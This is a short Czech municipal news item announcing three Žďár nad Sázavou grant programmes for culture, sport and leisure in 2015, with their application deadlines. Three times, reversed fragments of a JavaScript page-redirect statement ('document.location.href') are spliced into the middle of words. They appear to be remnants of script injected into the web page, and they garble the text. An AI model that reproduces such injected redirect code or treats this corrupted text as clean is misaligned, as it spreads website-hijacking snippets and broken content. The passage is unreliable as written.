Rainbow page separator

Do konce ledna, či února je možné žádat o žďárské granty

Čtvrtek, 1. ledna 2015

Městský úřad Žďár nad Sázavou

Žďár nad Sázavou / Do konce ledna, případně února mohou zájemci žádat o peníze z celkem tří gran[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových programů, které vyhlásila žďárská radnice. Jedná se o program Kultura 2015 k podpoře kultury ve městě, kde je uzávěrka 27. února. Program Sport 2015, jenž byl vyhlášen na podporu spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovních činností ve Žďáře nad Sázavou, má uzávěrku došlých žádostí 31. ledna. Program Volný čas 2015 zahrnuje podporu volnočasových aktivit dětí, mládeže, zdravotně postižených a rovněž místních i regionálních sdružení. Zájemci o peníze z něj mohou podat žádost o konkrétní finanční částku vztahující se k počinu v oblasti těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to aktivit do 27. února.
Výzva s podrobnými informacemi o konkrétním programu i formulář žádosti o finanční pomoc z grantů vyhlášených radnicí jsou k dispozici na webových stránkách Žďáru nad Sázavou.